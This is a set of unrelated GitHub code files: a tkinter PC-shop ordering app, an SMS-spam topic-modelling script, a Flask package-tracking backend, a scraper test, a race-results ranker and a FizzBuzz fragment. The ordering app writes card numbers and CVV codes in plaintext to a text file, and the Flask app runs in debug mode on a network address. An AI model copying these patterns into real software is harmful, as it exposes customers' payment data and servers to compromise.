rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 5 1600\\n GTX 1660Ti\\n DDR4 8GB 3200Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.765, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty4, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.765, rely=0.790)\n \n Button(app, text=\"Checkout\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=checkoutscreen, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.240) 
#checkout button which opens checkout screen\n        Button(app, text=\"Clear Cart\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=clearcart, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.205) #clear cart button which clears the main and secondary carts\n        \n        Label(app, text=\"Items In Cart:\", width=11, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.917, rely=0.285) \n        Label(app, textvariable = addtocart, width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.960, rely=0.285) #label which shows the total number of items in the cart\n    \n    def laptops(): #same things as PCs(OKASHA)\n        pc = PhotoImage(file = \"laptop1.png\", height=300)\n        w = Label(app, image = pc)\n        w.place(relx=0.165, rely=0.350)\n        w.photo = pc\n        pc = Label(app, text=\"Interstellar\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n        pc.place(relx=0.165, rely=0.350)\n        pctext = Label(app, text=\"Price: $2800\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext.place(relx=0.165, rely=0.650)\n        pctext2 = Label(app, text=\"Intel Core i5 6700K\\n GTX 1060Ti\\n DDR4 16GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext2.place(relx=0.165, rely=0.690)\n        cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty5, font=(\"Calibri\", 13, \"bold\"))\n        cartbutton.place(relx=0.165, rely=0.790)\n        \n        pc = PhotoImage(file = \"laptop2.png\", height=300)\n        w = Label(app, image = pc)\n        w.place(relx=0.365, rely=0.350)\n        w.photo = pc\n        pc = Label(app, text=\"NASA Super\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n        pc.place(relx=0.365, rely=0.350)\n        pctext = Label(app, text=\"Price: $4000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext.place(relx=0.365, rely=0.650)\n        pctext2 = Label(app, text=\"AMD Threadripper 2950X\\n RTX 2080Ti\\n DDR4 64GB 3200Mhz\\n 2TB SSD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext2.place(relx=0.365, rely=0.690)\n        cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty6, font=(\"Calibri\", 13, \"bold\"))\n        cartbutton.place(relx=0.365, rely=0.790)\n        \n        pc = PhotoImage(file = \"laptop3.png\", height=300)\n        w = Label(app, image = pc)\n        w.place(relx=0.565, rely=0.350)\n        w.photo = pc\n        pc = Label(app, text=\"Heatwave\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n        pc.place(relx=0.565, rely=0.350)\n        pctext = Label(app, text=\"Price: $1000\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext.place(relx=0.565, rely=0.650)\n        pctext2 = Label(app, text=\"AMD Ryzen 5 1600g\\n GTX 1050Ti OC\\n DDR4 8GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n        pctext2.place(relx=0.565, rely=0.690)\n        cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty7, font=(\"Calibri\", 13, \"bold\"))\n        cartbutton.place(relx=0.565, rely=0.790)\n        \n        pc = PhotoImage(file = \"laptop4.png\", height=300)\n        w = Label(app, image = pc)\n        w.place(relx=0.765, rely=0.350)\n        w.photo = pc\n        pc = Label(app, text=\"Zoomer\", width=10, height=1, bg=\"#383838\", fg=\"#ffa500\", font=(\"Calibri\", 13, \"bold\"))\n        pc.place(relx=0.765, rely=0.350)\n        pctext = Label(app, 
text=\"Price: $900\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext.place(relx=0.765, rely=0.650)\n pctext2 = Label(app, text=\"AMD Ryzen 5 1600\\n GTX 950Ti\\n DDR4 8GB 3000Mhz\\n 1TB HDD\", width=33, font=(\"Calibri\", 13, \"bold\"))\n pctext2.place(relx=0.765, rely=0.690)\n cartbutton = Button(app, text=\"Add To Cart\", width=33, borderwidth=3, relief=\"solid\", bg=\"#383838\", fg=\"#ffa500\", command=cartqty8, font=(\"Calibri\", 13, \"bold\"))\n cartbutton.place(relx=0.765, rely=0.790)\n \n Button(app, text=\"Checkout\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=checkoutscreen, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.240)\n Button(app, text=\"Clear Cart\", width=11, height=2, borderwidth=3, relief=\"solid\", bg=\"#ffa500\", fg=\"black\", command=clearcart, font=(\"Calibri\", 10, \"bold\")).place(relx=0.947, rely=0.205)\n \n Label(app, text=\"Items In Cart:\", width=11, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.917, rely=0.285)\n Label(app, textvariable = addtocart, width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.960, rely=0.285)\n\n sidebarlol = Label(app, width=33, height=41, bg=\"#383838\").place(relx=0.0096, rely=0.40)\n button2 = Button(app, text=\"=\", width=25, height=1, bg=\"#383838\", command=sidebarhide, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #button which hides the sidebar\n button2.place(relx=0.01, rely=0.350)\n \n gaming = Button(app, text=\"Gaming PCs\", width=23, height=1, bg=\"#ffa500\", fg=\"#383838\", borderwidth=3, relief=\"solid\", command=pcs, font=(\"Calibri\", 13, \"bold\")) #button that shows pc products\n gaming.place(relx=0.0145, rely=0.410)\n \n laptop = Button(app, text=\"Laptops\", width=23, height=1, bg=\"#ffa500\", fg=\"#383838\", borderwidth=3, relief=\"solid\", command=laptops, font=(\"Calibri\", 13, \"bold\")) #button that shows laptop products\n laptop.place(relx=0.0145, rely=0.470)\n\napp = Tk() #main form for main menu(HARNOOR AND OKASHA)\napp.title(\"APC - A PC BUILT LIKE A TANK\") #title for main form\napp.state(\"zoomed\") #basically makes the form fullscreen automatically\napp.resizable(0,0) #makes it so you cannot resize the form\napp.config(bg=\"AntiqueWhite3\") #bg of form\nlogo = PhotoImage(file = \"logo.png\", height=350) #photo that displays our logo at the top header\nw = Label(app, image = logo)\nw.photo = logo\nw.pack()\n\nsidebar = Button(app, text=\"=\", width=23, height=1, bg=\"#383838\", command=menu, fg=\"white\", font=(\"Calibri\", 13, \"bold\")) #sidebar button which opens and closes sidebar\nsidebar.place(relx=0.01, rely=0.350)\n\naddtocart = IntVar() #makes addtocart an intvar\naddtocart.set(0) #sets add to cart to 0 because it is an intvar\n\ndef checkoutscreen(): #function for our checkout screen (HARNOOR)\n global e1 #globals our entry boxes which basically makes them visible to the entire code\n global e2\n global e3\n global e4\n global e5\n global e6\n global e7\n global e8\n global e9\n global e10\n global e11\n global e12\n global chk\n chk = Tk() #form for our checkout screen\n chk.title(\"Checkout\")\n chk.geometry(\"800x800+540+120\") #the size of our checkout screen which makes it centered as well\n chk.config(bg=\"#383838\")\n chk.resizable(0,0) \n \n Label(chk, width=3, height=100, bg=\"white\").place(relx=0.37, rely=0.298)\n Label(chk, text= \"View Order\", bg=\"orange\", width=\"500\", height=\"8\", font=(\"Calibri\", 18, 
\"bold\")).pack()\n Label(chk, text= \"Quantity:\", bg=\"orange\", width=8, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.320)\n Label(chk, text = sum(quadstellar), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.375) #label which includes the sum of items in the quadstellar cart, we basically made multiple lists or carts for each product so we can show the user how much of what they ordered and then eventually give them a total.\n Label(chk, text = sum(moonrock), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.425)\n Label(chk, text = sum(snowflake), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.475)\n Label(chk, text = sum(boomer), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.525)\n Label(chk, text = sum(interstellar), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.575)\n Label(chk, text = sum(nasasuper), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.625)\n Label(chk, text = sum(heatwave), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.675)\n Label(chk, text = sum(zoomer), width=8, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.01, rely=0.725)\n Label(chk, text= \"Item:\", bg=\"orange\", width=15, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.320)\n Label(chk, text = \"Quadstellar\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.375)\n Label(chk, text = \"Moonrock\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.425)\n Label(chk, text = \"Snowflake\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.475)\n Label(chk, text = \"Boomer\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.525)\n Label(chk, text = \"Interstellar\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.575)\n Label(chk, text = \"NasaSuper\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.625)\n Label(chk, text = \"Heatwave\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.675)\n Label(chk, text = \"Zoomer\", width=15, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.10, rely=0.725)\n Label(chk, text= \"Price:\", bg=\"orange\", width=10, height=2, font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.320)\n Label(chk, text = sum(quadstellar)*(price[0]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.375) #label which multiplies the quantity of the item and its respective price\n Label(chk, text = sum(moonrock)*(price[1]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.425)\n Label(chk, text = sum(snowflake)*(price[2]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 
10, \"bold\")).place(relx=0.25, rely=0.475)\n Label(chk, text = sum(boomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.525)\n Label(chk, text = sum(interstellar)*(price[0]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.575)\n Label(chk, text = sum(nasasuper)*(price[1]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.625)\n Label(chk, text = sum(heatwave)*(price[2]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.675)\n Label(chk, text = sum(zoomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.725)\n total = Label(chk, text = sum(quadstellar)*(price[0]) + sum(moonrock)*(price[1]) + sum(snowflake)*(price[2]) + sum(boomer)*(price[3]) + sum(interstellar)*(price[0]) + sum(nasasuper)*(price[1]) + sum(heatwave)*(price[2]) + sum(zoomer)*(price[3]), width=10, height=2, borderwidth=3, relief=\"solid\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.25, rely=0.775) #label which gets the total price of all items\n \n #(OKASHA) \n Label(chk, text = \"First Name: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.320) #label for first name entry\n e1 = Entry(chk, borderwidth=3, relief=\"solid\") #entry for first name label\n e1.place(relx=0.60, rely=0.320, height=37) #coords for entry box\n e1.get() #gets info written in entry box \n Label(chk, text = \"Last Name: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.370)\n e2 = Entry(chk, borderwidth=3, relief=\"solid\")\n e2.place(relx=0.60, rely=0.370, height=37)\n e2.get()\n Label(chk, text = \"Phone Number: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.420)\n e3 = Entry(chk, borderwidth=3, relief=\"solid\")\n e3.place(relx=0.60, rely=0.420, height=37)\n e3.get()\n Label(chk, text = \"Email Address: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.470)\n e4 = Entry(chk, borderwidth=3, relief=\"solid\")\n e4.place(relx=0.60, rely=0.470, height=37)\n e4.get()\n Label(chk, text = \"Address: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.520)\n e5 = Entry(chk, borderwidth=3, relief=\"solid\")\n e5.place(relx=0.60, rely=0.520, height=37)\n e5.get()\n Label(chk, text = \"Address: (optional)\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.570)\n Entry(chk, borderwidth=3, relief=\"solid\").place(relx=0.60, rely=0.570, height=37)\n Label(chk, text = \"City: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.620)\n e6 = Entry(chk, borderwidth=3, relief=\"solid\")\n e6.place(relx=0.60, rely=0.620, height=37)\n e6.get()\n Label(chk, text = \"Province/State: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.670)\n e7 = Entry(chk, borderwidth=3, relief=\"solid\")\n e7.place(relx=0.60, rely=0.670, height=37)\n e7.get()\n Label(chk, text = \"Country: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.720)\n e8 = Entry(chk, borderwidth=3, relief=\"solid\")\n e8.place(relx=0.60, rely=0.720, 
height=37)\n    e8.get()\n    Label(chk, text = \"Postal Code/Zip Code: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.770)\n    e9 = Entry(chk, borderwidth=3, relief=\"solid\")\n    e9.place(relx=0.60, rely=0.770, height=37)\n    e9.get()\n    Label(chk, text=\"Credit Card Number: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.820)\n    e10 = Entry(chk, borderwidth=3, relief=\"solid\")\n    e10.place(relx=0.60, rely=0.820, height=37)\n    e10.get()\n    Label(chk, text=\"CVV Code: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.870)\n    e11 = Entry(chk, borderwidth=3, relief=\"solid\")\n    e11.place(relx=0.60, rely=0.870, height=37)\n    e11.get()\n    Label(chk, text=\"Expiration Date: *\", width=18, height=2, bg=\"orange\", font=(\"Calibri\", 10, \"bold\")).place(relx=0.43, rely=0.920)\n    e12 = Entry(chk, borderwidth=3, relief=\"solid\")\n    e12.place(relx=0.60, rely=0.920, height=37)\n    e12.get()\n    Button(chk, text=\"Checkout\", width=14, height=1, bg=\"#383838\", fg=\"white\", command=save_data, font=(\"Calibri\", 13, \"bold\")).place(relx=0.79, rely=0.920) #button which initiates the save data function\n    chk.mainloop() \n    \ndef save_data(): #save data function initiated by the button #(HARNOOR AND OKASHA)\n    if e1.get()==\"\" or e2.get()==\"\" or e3.get()==\"\" or e4.get()==\"\" or e5.get()==\"\" or e6.get()==\"\" or e7.get()==\"\" or e8.get()==\"\" or e9.get()==\"\" or e10.get()==\"\" or e11.get()==\"\" or e12.get()==\"\": #shows an error if any required entry box is empty\n        tkinter.messagebox.showerror(\"Error\", \"Please fill out all required fields.\") #shows tkinter.messagebox error\n        chk.destroy()\n    else:\n        fileD = open(\"database.txt\", \"a\") #opens the text file in append mode; closed once every field is written\n        fileD.write(\"First Name:\\n\")\n        fileD.write(\"%s\\n\" % e1.get()) #writes data received from the entry field by using get and appends it to the text file\n        fileD.write(\"Last Name:\\n\")\n        fileD.write(\"%s\\n\" %e2.get())\n        fileD.write(\"Phone Number:\\n\")\n        fileD.write(\"%s\\n\" %e3.get())\n        fileD.write(\"Email Address:\\n\")\n        fileD.write(\"%s\\n\" %e4.get())\n        fileD.write(\"Address:\\n\")\n        fileD.write(\"%s\\n\" %e5.get())\n        fileD.write(\"City:\\n\")\n        fileD.write(\"%s\\n\" %e6.get())\n        fileD.write(\"Province/State:\\n\")\n        fileD.write(\"%s\\n\" %e7.get())\n        fileD.write(\"Country:\\n\")\n        fileD.write(\"%s\\n\" %e8.get())\n        fileD.write(\"Postal Code/Zip Code:\\n\")\n        fileD.write(\"%s\\n\" %e9.get())\n        fileD.write(\"Credit Card Number:\\n\")\n        fileD.write(\"%s\\n\" %e10.get())\n        fileD.write(\"CVV Code:\\n\")\n        fileD.write(\"%s\\n\" %e11.get())\n        fileD.write(\"Expiration Date:\\n\")\n        fileD.write(\"%s\\n\" %e12.get())\n        fileD.close() #close the file so the order is actually flushed to disk\n        tkinter.messagebox.showinfo(\"Success\", \"Your order has been placed!\") #if the entry boxes are not empty and everything is filled, shows success\n        quadstellar.clear() #clears all items from carts\n        moonrock.clear()\n        snowflake.clear()\n        boomer.clear()\n        interstellar.clear()\n        nasasuper.clear()\n        heatwave.clear()\n        zoomer.clear()\n        addtocart.set(0) #sets main cart to 0\n        chk.destroy()\n    \n#(HARNOOR)\n    \ndef cartqty1():\n    addtocart.set(addtocart.get() +1) #adds 1 to main cart/list (for quantity)\n    quadstellar.append(quantity[0]) #appends one unit to the quadstellar cart list; sum(quadstellar) gives the quantity ordered\n    \ndef cartqty2():\n    addtocart.set(addtocart.get() +1)\n    moonrock.append(quantity[0])\n    \ndef cartqty3():\n    addtocart.set(addtocart.get() +1)\n    snowflake.append(quantity[0]) \n    
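A note on the cart bookkeeping used in the record above: each product's "cart" is a plain list of unit quantities, so sum(cart) is the quantity ordered and sum(cart) * unit_price is the line total. A minimal standalone sketch of the same pattern — the names carts and prices here are hypothetical illustrations, not taken from the record:

    carts = {"quadstellar": [], "moonrock": []}        # one list per product
    prices = {"quadstellar": 2500, "moonrock": 1800}   # assumed unit prices

    def add_to_cart(name, qty=1):
        carts[name].append(qty)  # append one unit per click, like cartqty1()

    add_to_cart("quadstellar"); add_to_cart("quadstellar"); add_to_cart("moonrock")
    total = sum(sum(c) * prices[n] for n, c in carts.items())
    print(total)  # 2*2500 + 1*1800 = 6800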
\ndef cartqty4():\n addtocart.set(addtocart.get() +1)\n boomer.append(quantity[0])\n \n#(OKASHA) \n \ndef cartqty5():\n addtocart.set(addtocart.get() +1)\n interstellar.append(quantity[0])\n \ndef cartqty6():\n addtocart.set(addtocart.get() +1)\n nasasuper.append(quantity[0])\n \ndef cartqty7():\n addtocart.set(addtocart.get() +1)\n heatwave.append(quantity[0])\n \ndef cartqty8():\n addtocart.set(addtocart.get() +1)\n zoomer.append(quantity[0])\n \napp.mainloop() #re loops form","repo_name":"okashashuda/product-ordering-system","sub_path":"product_ordering_system.py","file_name":"product_ordering_system.py","file_ext":"py","file_size_in_byte":24071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39384115967","text":"import pandas as pd\nimport numpy as np\nfrom nlpia.data.loaders import get_data\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.tokenize.casual import casual_tokenize\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\n\n\npd.options.display.width = 120\n\nsms = get_data('sms-spam')\nindex = ['sms{}{}'.format(i, '!' * j) for (i, j) in zip(range(len(sms)), sms.spam)]\n\nsms.index = index\nprint(sms.head(6))\n\ntfidf = TfidfVectorizer(tokenizer=casual_tokenize)\ntfidf_docs = tfidf.fit_transform(raw_documents=sms.text).toarray()\nprint('\\nLen TF-IDF vocabulary:', len(tfidf.vocabulary_))\n\ntfidf_docs = pd.DataFrame(tfidf_docs)\n# center vectorized documents (BOW vectors) by subtracting the mean\ntfidf_docs = tfidf_docs - tfidf_docs.mean()\nprint('TF-IDF shape:', tfidf_docs.shape)\nprint(\"sms.spam.sum()\", sms.spam.sum())\n\n\npca = PCA(n_components=16)\npca = pca.fit(tfidf_docs)\npca_topic_vectors = pca.transform(tfidf_docs)\ncolumns = ['topic{}'.format(i) for i in range(pca.n_components)]\npca_topic_vectors = pd.DataFrame(pca_topic_vectors, columns=columns, index=index)\nprint(pca_topic_vectors.round(3).head(6))\n\n# print(tfidf.vocabulary_)\ncolumn_nums, terms = zip(*sorted(zip(tfidf.vocabulary_.values(), tfidf.vocabulary_.keys())))\n# print(terms)\n\n# get weights from PCA for words in vocabulary\nweights = pd.DataFrame(pca.components_, columns=terms, index=['topic{}'.format(i) for i in range(16)])\npd.options.display.max_columns = 0\nprint(weights.head(4).round(3))\n\nprint('\\n\\nShow weights for each topic for words in example')\npd.options.display.max_columns = 12\ndeals = weights['! 
;) :) half off free crazy deal only $ 80 %'.split()].round(3) * 100\nprint(deals)\nprint('\\ndeals.T.sum()\\n', deals.T.sum())\n\nprint('\\n\\nTESTING and comparing TruncatedSVD Vs PCA')\nsvd = TruncatedSVD(n_components=16, n_iter=100)\nsvd_topic_vectors = svd.fit_transform(tfidf_docs.values)\nsvd_topic_vectors = pd.DataFrame(svd_topic_vectors, columns=columns, index=index)\nprint(svd_topic_vectors.round(3).head(6))\n\n# Normalizing each topic vector by its length (L2-norm) allows you to compute the cosine\n# distance with a dot product\nsvd_topic_vectors = (svd_topic_vectors.T / np.linalg.norm(svd_topic_vectors, axis=1)).T\nprint('\\n\\nCheck LSA for spam classification')\nprint(svd_topic_vectors.iloc[:10].dot(svd_topic_vectors.iloc[:10].T).round(1))\n","repo_name":"VolDonets/natural_language_processing","sub_path":"part_3/e5_PCA_on_sms_spam.py","file_name":"e5_PCA_on_sms_spam.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"19236831200","text":"from flask import Flask, make_response, jsonify, render_template\n\nfrom Item import Item\nfrom ItemCache import ItemCache\nfrom NetworkRequest import NetworkRequest\nfrom TamperDetector import TamperDetector\n\napp = Flask(__name__, template_folder='templates')\n\n\n@app.route('/')\ndef landing():\n    \"\"\"\n    Landing page that describes the endpoints\n    \"\"\"\n    return render_template('index.html')\n\n\n@app.route('/tamper/<barcode>')\ndef tamper(barcode):\n    \"\"\"\n    Detects damage or tamper to a particular package indicated by barcode\n\n    :return: True if the item has been damaged, False otherwise\n    \"\"\"\n\n    item = ItemCache.get_instance().get_item(barcode)\n    response = TamperDetector.detect(item)\n\n    return make_response(jsonify(response), 200)\n\n\n@app.route('/get/<barcode>')\ndef get(barcode):\n    \"\"\"\n    fetch the data from SICK Package Analytics\n\n    :param barcode:\n    :return: {\n        results : {\n            \n        }\n        systems: {\n            \n        }\n    }\n    \"\"\"\n    json_response = NetworkRequest.send_request(barcode)\n    # print(json_response)\n    if json_response is not None and \"results\" in json_response and json_response[\"results\"]:\n        # only add item if response contains data\n        item = Item(json_response[\"results\"])\n        ItemCache.get_instance().add_item(barcode, item)\n        # NetworkRequest.send_request_pictures(item, barcode)\n        # print(\"sending picture request\")\n        return make_response(item.get_data_json(), 200)\n    else:\n        return make_response(jsonify(json_response), 200)\n\n\n@app.route('/get_pictures/<barcode>')\ndef get_pictures(barcode):\n    \"\"\"\n    retrieve the pictures of a particular item and return them as a JSON with\n    the \"results\" mapped to the dictionary of pictures in item\n    {\n        \"results\": \n    }\n\n    if no item present for the barcode request returns\n    {\n        \"results\": null\n    }\n    \"\"\"\n    resp = {}\n    item = ItemCache.get_instance().get_item(barcode)\n    if item is None:\n        resp[\"results\"] = None\n    else:\n        resp[\"results\"] = NetworkRequest.send_request_pictures(item)\n    # print(resp)\n    return make_response(jsonify(resp), 200)\n\n\n@app.route('/get_system_config')\ndef get_system_config():\n    \"\"\"\n    Gets the system configuration for facility 1 (defined in the url endpoint)\n    returns a dictionary that maps system to another map of deviceId to deviceName\n\n    :return: see example below\n    {\n        \"1\": {\n            \"1\": \"Top\",\n            \"2\": \"LF\",\n            \"3\": \"LB\",\n            \"4\": \"RB\",\n            \"5\": \"RF\",\n            \"6\": \"Bot\",\n            \"7\": \"CLV1\",\n            \"8\": \"CLV2\",\n        },\n        ...\n    }\n    \"\"\"\n    return make_response(jsonify(NetworkRequest.send_request_system_config()))
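With the <barcode> path parameters restored on the routes above, the service can be exercised with plain requests calls. A minimal client sketch — the host, port, and barcode value are assumptions for illustration, not from this record:

    import requests

    BASE = "http://192.168.0.221:5000"  # address app.run() binds below; 5000 is Flask's default port
    barcode = "0123456789"              # hypothetical package barcode

    # fetch the package data, then ask whether the package was damaged in transit
    data = requests.get(f"{BASE}/get/{barcode}").json()
    verdict = requests.get(f"{BASE}/tamper/{barcode}").json()
    print(data, verdict)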
\n\n\nif __name__ == '__main__':\n    # print(__name__)\n    # app.run(debug=True)\n    app.run(host=\"192.168.0.221\", debug=True)\n","repo_name":"Huw-man/SickAR_backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"36627740214","text":"import requests\nimport sys\nfrom .parser import parse_html\n\ndef parse_test(url):\n    proxies = {\n        'http': 'http://10.120.193.201:8123'\n    }\n\n    r = requests.get(url, proxies=proxies)\n    if r.status_code != 200:\n        print(\"Error, status code is {0}\".format(r.status_code))\n        return\n\n    print(\"Result:\")\n    print(parse_html(r.text))\n\nif len(sys.argv) < 2:\n    print(\"Usage: {0} url\".format(sys.argv[0]))\nelse:\n    parse_test(sys.argv[1])\n","repo_name":"ogigoc/deep-web-hackathon","sub_path":"parsing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} {"seq_id":"38691182889","text":"import json\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nwith open('competitors2.json', 'r', encoding='utf-8') as file1, open('results_RUN.txt') as file2:\r\n    competitors = json.load(file1)\r\n    result = {}\r\n\r\n    for i in file2.readlines():\r\n        \r\n        i = i.replace('п»ї', '').split()  # drop the UTF-8 BOM, which shows up as 'п»ї' when mis-decoded\r\n        result.setdefault(i[0], []).extend(i[1:])\r\n\r\n\r\n    for key, val in result.items():\r\n        z = datetime.strptime(val[3], '%H:%M:%S,%f') - datetime.strptime(val[1], '%H:%M:%S,%f')\r\n        val.clear()\r\n        val.append(z)\r\n\r\n    k = [(i[0], str(*i[1])[2:10].replace('.', ',')) for i in sorted(result.items(), key=lambda item: item[1])[:4]]\r\n\r\n    counter = 1\r\n    df = pd.DataFrame()\r\n    for i in k:\r\n        new_df = pd.DataFrame([{'Place': counter, 'Bib number': i[0], 'First name': competitors[i[0]]['Name'], 'Last name': competitors[i[0]]['Surname'], 'Result': i[1]}])\r\n        df = pd.concat([df, new_df], axis=0, ignore_index=True)\r\n        counter += 1\r\nprint(df) \r\n","repo_name":"AnnaOborovskaya/07-08-2023-AnnaOborovskaya","sub_path":"winners.py","file_name":"winners.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} {"seq_id":"42643403360","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Build lists of multiples of 3 & 5.\ndef multiples():\n    b = 3\n    c = 5\n    x = []\n    y = []\n    for i in range(34):\n        x.append(b*i)\n    for i in range(21):\n        y.append(c*i)\n    return x, y\n\n# Print 'Fizz', 'Buzz', 'Fizzbuzz', or number from value in list.\ndef fizzbuzz(num):\n    # Print 'fizz' if multiple of 3 and not 5\n    if (num in x) and (num not in y):\n        print('fizz')\n        return\n    # Print 'buzz' if multiple of 5 and not 3\n    if (num in y) and (num not in x):\n        print('buzz')\n        return\n    # Print 'fizzbuzz' if multiple of both 3 and 